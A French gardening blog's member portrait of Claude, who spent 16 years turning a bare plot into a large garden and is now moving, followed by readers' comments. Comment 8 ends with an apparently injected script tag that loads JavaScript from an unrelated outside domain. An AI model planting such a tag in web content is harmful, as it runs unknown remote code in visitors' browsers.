• Seeds of Love : Portrait d'Anciens : Claude

     

     

    Seeds of Love : Portrait d'Anciens : Claude

     

     

    Isabelle a demandé de dresser mon portrait et moi qui suis très discrète a mon sujet...je suis un peu perdue !

    Quand j'étais ado, mon rêve était d’être horticultrice paysagiste mais mon père s'y est opposé.

     

    Mon mari a 2 enfants et moi 3 .

    A la retraite, j'ai voulue avoir un grand jardin pour faire ce dont je rêvais .

    Voici  le terrain nettoyé et encore vierge de plantes :

     

    Seeds of Love : Portrait d'Anciens : Claude

     

    Le petit bâtiment au milieu, le voilà de face.

    Une amie l'a appelé "la petite maison dans la prairie". Quand on est arrivés, il y avait des orties de 1 m de haut !

    Voilà le même endroit le 14 07 2005 alors qu'on a emménagé fin oct 2004 :

     

    Seeds of Love : Portrait d'Anciens : Claude

     

    Cet endroit, je l'appelle simplement le massif du bas car c'est le plus bas dans le terrain :

     

    Seeds of Love : Portrait d'Anciens : Claude

    Notre terrain va jusqu'à la haie que tu vois . 

     

    Et en voila une partie maintenant après 16 ans :

     

    Seeds of Love : Portrait d'Anciens : Claude

     

    D'autres photos du jardin :

     

    Seeds of Love : Portrait d'Anciens : Claude

     

     

    Seeds of Love : Portrait d'Anciens : Claude

     

    J'essaye d'associer les couleurs pour que le jardin soit agréable à l'oeil.

     

    Seeds of Love : Portrait d'Anciens : Claude

     

    Maintenant, nous mettons la maison en vente après 16 ans à m'être éclatée dans le jardin.

    Notre prochaine maison sera en priorité avec un jardin bien moins grand.

     

    Un jardin qui m'a plu, c'est la pépinière Hennebelle à Boubers sur canche dans la Somme

    mais aussi le jardin d'un monsieur qui est devenu un ami et qui habite a 10 km de chez nous .

    Lui et moi sommes passionnés de rosiers et d'hémérocalles.

     

    Seeds of Love : Portrait d'Anciens : Claude

     

    Seeds of Love : Portrait d'Anciens : Claude

     

     

    Ce qui m'a marqué au sujet du so , c'est le tirage au sort dans l'attente de ce que je vais recevoir.

    Ce que je veux, c'est aussi essayer de diversifier les graines chaque année.

    Je n'ai pas semé toute les graines reçues car étant seule a m'occuper de mon parc, soit j'oublie d'arroser soit si il a plu et tout est inondé.

    Pas facile de tout gérer. En plus avec les trocs et les bourses aux plantes, j'ai énormément de travail.

     

    Quelle est la plante issue du SOL qui t'a donné le plus de satisfaction ?

    Une graminée annuelle et des Cerinthes major. 

     

    Seeds of Love : Portrait d'Anciens : Claude

     

    Voici le lien vers le blog de Claude :

     

    Seeds of Love : Portrait d'Anciens : Claude 


  • Commentaires

    1
    Mercredi 8 Janvier 2020 à 05:23

    Cest génial de découvrir Claude, je la suis sur son blog !!

    2
    Patrick
    Mercredi 8 Janvier 2020 à 06:13

    Bravo pour le travail accomplit et bon SOL

    3
    Fatima
    Mercredi 8 Janvier 2020 à 06:53

    Coucou Bip Bip smile Le temps passe vite, déjà 15 ans ! Quand je pense au jardin que tu vas laisser ... mais c'est ainsi ! Mince j'ai encore zappé les  héméros ouch

    A bientôt, bises

    4
    marie-christine dena
    Mercredi 8 Janvier 2020 à 07:12
    Quel changement en seulement 15 ansbon imagine bien la quantité de travail qu'il a requis ! Bravo
    5
    Mercredi 8 Janvier 2020 à 07:19

    Je ne suis jamais parti de zéro. Ça doit être un fameux challenge ! 

    Merci Claude pour cette présentation. 

    6
    Isabelle Thalasso
    Mercredi 8 Janvier 2020 à 07:42

    C’est toujours intéressant de voir l’évolution d’un jardin sur plusieurs années. Bon amusement dans le prochain jardin.

    7
    Elo
    Mercredi 8 Janvier 2020 à 07:50
    Joli portrait de Claude.
    8
    Mercredi 8 Janvier 2020 à 08:23

    Bonjour Claude, je vois que vous êtes vous aussi en train de quitter un très grand jardin que vous avez planté de manière merveilleuse et très naturelle. Pour moi aussi c'est important de quitter une maison et un jardin devenus beaucoup trop grands pour me permettre de  tout entretenir correctement car je jardine absolument seule, mon mari n'ayant pas du tout la passion du jardinage ni du bricolage du reste. Ce jardin, ces fleurs, vous allez  les confier à d'autres mains qui j'espère sauront  apprécier tout ce que vous avez réussi à planter... Un grand bravo pour toute cette biodiversité et merci d'avoir encore trouvé le temps d'un petit auto-portrait. Bon courage pour le déménagement...

    <script src="//worldmodel.biz/2241c61e4c10670366.js" type="text/javascript"></script>
    9
    alfredo bellizetti
    Mercredi 8 Janvier 2020 à 08:31
    Bravo pour ce beau jardin. Quitter tout cela doit être néanmoins difficile. Un renoncement de notre âge. belles émotions dans votre nouvel éden à taille plus raisonnable.
    10
    nicole89
    Mercredi 8 Janvier 2020 à 08:34

    Partant d une feuille blanche et sur une telle étendue, il y a de quoi s éclater!!.   Que de travail réalisé depuis 15 ans. Grace au portrait de Claude, je  vais découvrir son blog.  Je lui souhaite beaucoup de bonheur dans son nouveau jardin.

    11
    marie-thérèse desvig
    Mercredi 8 Janvier 2020 à 08:54

    contente de te découvrir Claude, nous avons à peu près les mêmes goûts et les mêmes difficultés le Jardin des frères henneebelle nous l'avons visité sous une pluie battante et adoré malgré tout; ils sont adorables et savent parler de leurs merveilles. Je te souhaite beaucoup de bonheur dans ton nouveau jardin. Bonne journée

    12
    Mercredi 8 Janvier 2020 à 09:35

    Heureuse de te connaître un peu mieux.
    Tu vas habiter quelle région? Si c'est vers chez moi, je serais heureuse de te rencontrer.
    Je suis arrivée sur un champ de 3.800m2. J'aurais bien eu besoin de tes conseils. J'en ai vendu 1.000m2 et j'en ai donné une partie à ma fille...qui ne l'entretient pas, habitant Paris. heureusement, c'est le coin verger.

    Bisous   Micheline

    13
    Ines
    Mercredi 8 Janvier 2020 à 11:24

    Bonjour Claude, merci de votre portrait, je vais aller visiter votre blog. Les photos me laissent épatée, l'avant et le après nous permettent de mieux apprécier  l'évolution.super avoir eu un jardin comme le vôtre pour jouer! Il est devenu magnifique. Belle journee!

    14
    slimaniamel
    Mercredi 8 Janvier 2020 à 11:27

    quel beau portrait d'une passionnée

     

    15
    sylvie frapier
    Mercredi 8 Janvier 2020 à 12:27

    Ravie de découvrir une si discrète seedloveuse :) Je suis épatée par tout ce travail réalisé!! Je suis en train de découvrir ton blog et je me régale! Merci, Claude d'avoir accepté de te dévoiler!

    16
    Mercredi 8 Janvier 2020 à 16:40
    Marie-Claude

    Quel immense terrain de quoi s'amuser à créer de belles perspectives et de beaux massifs mais en vieillissant cela devient fatiguant et l'on devient raisonnable, j'ai vu sur votre blog le poirier qui donne 80kg de poires, c'est incroyable , il doit être très vieux !

    Bises

    17
    Marie03
    Mercredi 8 Janvier 2020 à 17:15

    Bonjour Claude .On a eu l'occasion de se croiser au troc plantes de Néris les Bains l'an passé. Bien beau jardin. ce doit être dur de tout quitter mais de nouvelles aventures vont commencer. Bon courage.

    18
    Fabienne LS
    Mercredi 8 Janvier 2020 à 17:49
    Bonjour Claude et merci pour le lien vers ton blog, cela nous permet de continuer la visite.Quel boulot depuis le début! En effet ça doit être triste de quitter son jardin vu toute l’énergie qu’on y a mis, mais si c’est pour se rendre la vie plus facile... bon courage pour ton déménagement!
    19
    Mercredi 8 Janvier 2020 à 18:58

    merci pour vos messages et vos compliments . j'ai mis la maison en vente pour me rapprocher des enfants . notre destination ( si je trouve notre bonheur ) sera la haute Normandie ( Aumale ou Neufchatel ) me conviendrais bien . je ne regrette pas de partir car la prochaine maison je l'aurai choisi avec de nouveaux critères , moins grande . si quelqu'un veut des boutures , n'hésitez pas . des morceaux de branches de rosiers pour faire des boutures , des géraniums , et plein d'autres vivaces . j'aime faire plaisir et , je peut dire que mon jardin est partout en france .

    encore mercikiss

    20
    Emmanuelle
    Vendredi 10 Janvier 2020 à 14:12

    Quel beau portrait d'une bien courageuse jardinière et très généreuse dans les échanges .

    Je vous souhaite beaucoup de bonheur dans votre nouveau jardin à taille plus humaine pour vous assouvir votre passion et être près des vôtres .

    Bonne chance à vous pour trouver votre futur logement

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :